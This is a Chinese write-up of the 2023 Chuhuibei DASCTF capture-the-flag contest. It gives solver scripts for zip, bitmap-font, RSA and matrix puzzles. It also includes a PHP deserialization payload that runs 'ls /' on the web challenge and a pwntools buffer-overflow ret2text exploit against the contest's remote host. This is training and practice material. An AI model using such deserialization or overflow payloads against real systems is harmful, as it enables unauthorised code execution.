2023年楚慧杯(DASCTF)WP
怎么说呢,就是感觉比赛时间有点紧,3个小时15道题,然后还要结束前提交wp,就有点来不及,当时提交的wp还是匆匆一写。还有一个槽点就是这个比赛的时候不能看实时排名,只能依靠积分来盲猜,这多少有点难受(我们队有段时间积分掉到0.7我还以为要淘汰了。。。)
最后以一题之差屈居第二
MISC
ez_zip
用这个B神的脚本解套娃压缩包
import io
import zipfile
with open("ez_zip的附件.zip", "rb") as f:
data = f.read()
info = "taptap"
while True:
with zipfile.ZipFile(io.BytesIO(data), "r") as zf:
all_files_processed = True
for i in zf.filelist:
fileName = i.filename.encode("cp437").decode("gbk")
if zipfile.is_zipfile(io.BytesIO(zf.read(i.filename))):
print(fileName)
data = zf.read(i.filename)
all_files_processed = False
info += f" {fileName.replace('.zip', '')}"
else:
print(fileName)
with open(fileName, "wb") as f:
f.write(zf.read(i.filename))
if all_files_processed:
break
print(info)
然后获得一个1.txt
加号改为1,-号改为0
二进制转ASCII获得flag
DASCTF{10c58258ccf1e7c631e5911ed6acc4ed}
gb2312-80
先写脚本用点阵数据画图
from PIL import Image
def draw(s, ind):
lt = list(s)
i2 = Image.new("RGB", (16, 16))
for h in range(16):
for w in range(16):
x = lt[h * 16 + w]
color = (0, 0, 0) if x == '0' else (255, 255, 255)
i2.putpixel((w, h), color)
i2.save(str(ind) + ".png")
def trans(s):
lt = s.split(',')
out = ''.join(bin(int(x))[2:].zfill(16) for x in lt)
return out
with open('cipher.txt', 'r') as f:
for ind, line in enumerate(f):
line = line.strip()
draw(trans(line), ind)
找到对应关系,然后找下对应关系,写脚本转换
dir = {
'0,0,992,1584,3096,3096,3096,3096,3096,3096,3096,3096,1584,992,0,0':'0',
'0,0,128,896,384,384,384,384,384,384,384,384,384,960,0,0':'1',
'0,0,960,1632,3120,3120,48,48,96,192,384,784,1552,4080,0,0':'2',
'0,0,960,1632,3120,48,96,448,96,48,48,3120,1632,960,0,0':'3',
'0,64,192,448,960,704,1728,3264,3264,6336,8176,192,192,480,0,0':'4',
'0,0,4080,3072,3072,3072,4032,3680,48,48,48,3120,1632,960,0,0':'5',
'0,0,960,1632,3120,3072,3520,3680,3120,3120,3120,3120,1632,960,0,0':'6',
'0,0,4080,4080,2096,96,192,192,384,384,768,768,768,768,0,0':'7',
'0,0,960,1632,3120,3120,1632,960,1632,3120,3120,3120,1632,960,0,0':'8',
'0,0,960,1632,3120,3120,3120,3120,1648,1008,48,3120,1632,960,0,0':'9',
'0,0,0,0,0,0,1984,3168,96,2016,3168,3168,2008,0,0,0':'a',
'0,0,3584,1536,1536,1536,2016,1560,1560,1560,1560,1560,3056,0,0,0':'b',
'0,0,0,0,0,0,992,3120,3072,3072,3072,3120,2016,0,0,0':'c',
'0,0,224,96,96,96,2016,3168,3168,3168,3168,3168,2000,0,0,0':'d',
'0,0,0,0,0,0,992,3120,3120,4080,3072,3120,2016,0,0,0':'e',
'0,0,240,408,384,384,2016,384,384,384,384,384,960,0,0,0':'f'
}
f = open('cipher.txt','r')
for line in f.readlines():
line = line.strip('\n')
print(dir[line],end='')
f.close()
得到的数据解一下hex另存为zip,发现有个hint.txt,里面还有点阵
from PIL import Image
def draw(s,ind):
lt = list(s)
i2=Image.new("RGB",(16,16))
_ind = 0
for h in range(16):
for w in range(16):
x = lt[_ind]
if x == '0':
i2.putpixel((w, h), (0,0,0))
else:
i2.putpixel((w, h), (255,255,255))
_ind += 1
i2.save(str(ind)+".png")
s = '''0000001000000000000000010000000001111111111111100100001000000010100010010010010000101000110010000100101100000100000011000001000001110111111100000000000100000000001000010000100000100001000010000010000100001000001000010000100000111111111110000010000000001000
0000100000010000111111111111100000010000000100000001000100010000001000010001000000100101000100000011111100010000011001010001010010100101111111100010010000000100001001000010010000100111111101000010010000000100001111000000010000100100000101000000000000001000
0000111111100000000010000010000000001000001000000000111111100000000010000010000000001000001000000000111111100000000000000000010011111111111111100000000100000000000010010010000000001001111100000000100100000000000101010000000000100011000001100100000011111100
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011000000000000011110000000000001111000000000000011000000000000000000000000000000110000000000000111100000000000011110000000000000110000000000000000000000000
0000000000000000000000000000000000000011110000000000000110000000000000011000000000000001100000000000000110000000000000011000000000000001100000000000000110000000000000011000000000000001100000000000000110000000000000111100000000000000000000000000000000000000
0000000000000000000000000000000000011110000000000000110000000000000011000000000000001100000000000000110000000000000011000000000000001100000000000000110000000000000011000000000000001100000010000000110000011000000111111111100000000000000000000000000000000000
0000000000000000000000000000000000000011111000000000011000110000000011000001100000011000000011000001100000001100000110000000110000011000000011000001100000001100000110000000110000001100000110000000011000110000000000111110000000000000000000000000000000000000
0000000000000000000000000000000000111100000111000001100000001000000110000000100000011000000100000000110000010000000011000010000000001100001000000000011001000000000001100100000000000010100000000000001110000000000000010000000000000000000000000000000000000000
0000000000000000000000000000000000011111111110000000110000011000000011000000100000001100000000000000110000100000000011111110000000001100001000000000110000000000000011000000000000001100000010000000110000011000000111111111100000000000000000000000000000000000
0000000000000000000000000000000000011110001111000000110000011000000011000001100000001100000110000000110000011000000011111111100000001100000110000000110000011000000011000001100000001100000110000000110000011000000111100011110000000000000000000000000000000000
0000000000000000000000000000000000111111111110000010000000011000000000000011000000000000011000000000000011000000000000011000000000000011000000000000011000000000000011000000000000011000000010000011000000011000001111111111100000000000000000000000000000000000
0000000000000000000000000000000000011110011111000000110000110000000011000110000000001100110000000000110110000000000011111000000000001101110000000000110011100000000011000111000000001100001110000000110000011100000111100001111000000000000000000000000000000000
0000000000000000000000000000000000000000100000000000001110000000000000011000000000000001100000000000000110000000000000011000000000000001100000000000000110000000000000011000000000000001100000000000000110000000000000111100000000000000000000000000000000000000
0000000000000000000000000000000000000011110000000000011001100000000011000011000000001100000000000000110111000000000011100110000000001100001100000000110000110000000011000011000000001100001100000000011001100000000000111100000000000000000000000000000000000000'''
lt = s.split('\n')
ind = 0
for i in lt:
draw(i,ind)
ind+=1
再转换一下,得到密码为ILOVEHZK16
DASCTF{842a99305a07e6183830582d1740c1b1}
CRYPTO
so-large-e
读取公钥e,n
from Crypto.PublicKey import RSA
# 读取密钥文件
with open('pub.pem', 'r') as f:
key = RSA.importKey(f.read())
n=key.n
e=key.e
c =
6838759631922176040297411386959306230064807618456930982742841698524
6220168498072357260652721360436030271662490755600582326832301553466
1442956651130997785781513800429881513791372966233753537127701985619
3898546849896085411001528569293727010020290576888205244471943227253
000727727343731590226737192613447347860
print('n=',n)
print('e=',e)
n=
1165186793055152632908407067155796912139221692716345793275195629026
1354358262344960674154647292040199793004138855314190906948758946194
8798111698856100819163407893673249162209631978914843896272256274862
5014613210209619583670987591834871164174879226457826385108766097288
86007680825340200888068103951956139343723
e=
1134492478760713979112060700194959390881716967121827475021330631720
2156534578862726174095066589192265934002039722961932920452099909653
5909867327960323598168596664323692312516466648588320607291284630435
6822826307459476894319099984013895660819667534388697255836652943106
89820290368901166811028660086977458571233
e很大,Boneh和Durffe攻击
使用条件:
修改delta
# from __future__ import print_function
# import time
#
# ############################################
# # Config
# ##########################################
#
# """
# Setting debug to true will display more informations
# about the lattice, the bounds, the vectors...
# """
# debug = True
#
# """
# Setting strict to true will stop the algorithm (and
# return (-1, -1)) if we don't have a correct
# upperbound on the determinant. Note that this
# doesn't necesseraly mean that no solutions
# will be found since the theoretical upperbound is
# usualy far away from actual results. That is why
# you should probably use `strict = False`
# """
# strict = False
#
# """
# This is experimental, but has provided remarkable results
# so far. It tries to reduce the lattice as much as it can
# while keeping its efficiency. I see no reason
from Crypto.Util.number import long_to_bytes
c =
6838759631922176040297411386959306230064807618456930982742841698524
6220168498072357260652721360436030271662490755600582326832301553466
1442956651130997785781513800429881513791372966233753537127701985619
3898546849896085411001528569293727010020290576888205244471943227253
000727727343731590226737192613447347860
n=
1165186793055152632908407067155796912139221692716345793275195629026
1354358262344960674154647292040199793004138855314190906948758946194
8798111698856100819163407893673249162209631978914843896272256274862
5014613210209619583670987591834871164174879226457826385108766097288
86007680825340200888068103951956139343723
e=
1134492478760713979112060700194959390881716967121827475021330631720
2156534578862726174095066589192265934002039722961932920452099909653
5909867327960323598168596664323692312516466648588320607291284630435
6822826307459476894319099984013895660819667534388697255836652943106
89820290368901166811028660086977458571233
d=
6638223433976997289533369683177941184911459980322442665506941568300
36498673227937
m=long_to_bytes(int(pow(c,d,n)))
print(m)
matrixequation
直接上脚本
U = hint2/hint1
R = (hint3/U/hint1/U/hint1/U/hint1/U/hint1).inverse()
A = U.inverse()*E-R
alphabet = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&'()'
flag = ''
for k in range(24):
i, j = 5*k // 11, 5*k % 11
flag+=alphabet[A[i, j]]
E hint1 hint2 hint3按照ouput填即可
11行一个 矩阵
WEB
eaaeval
发现提交这个用户密码可以跳转到另一个页面dhwiaoubfeuobgeobg.php
通过目录爆破可以得到www.zip
反序列化,需要绕过
O:4:"Flag":2:{s:1:"a";s:2:"ls";s:1:"b";s:1:"/";}
执行ls /,看看flag在哪
绕过限制查看flag.txt
PWN
ez_base
找到start函数然后找到我们的vuln函数
调试发现在sub 处存在栈溢出漏洞
通过字符表的flag可以找到的后门函数
那么接下来就是很简单的ret2text
```python
from pwn import *
#p=process("./base")
p=remote("tcp.cloud.dasctf.com",23938)
p.recvuntil("2:decode")
p.sendline("1")
p.recvuntil("cin de_str:")
p.sendline("q"*0x28+p64(0x404911))
p.interactive()